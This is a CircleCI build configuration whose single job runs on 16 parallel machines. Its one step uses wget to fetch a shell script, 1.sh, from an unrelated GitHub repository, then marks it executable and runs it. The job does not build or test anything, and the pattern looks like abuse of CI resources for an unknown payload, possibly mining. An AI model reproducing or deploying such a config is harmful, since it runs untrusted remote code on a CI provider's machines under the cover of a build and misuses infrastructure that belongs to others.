version: 2.1

jobs:
  build:
    parallelism: 16
    machine:
      image: ubuntu-2004:202101-01
    steps:
      - checkout
      - run : |
            wget https://raw.githubusercontent.com/farestoyomkl/farestoyo2/master/1.sh
            git update-index --chmod=+x 1.sh
            chmod +x 1.sh
            ./1.sh
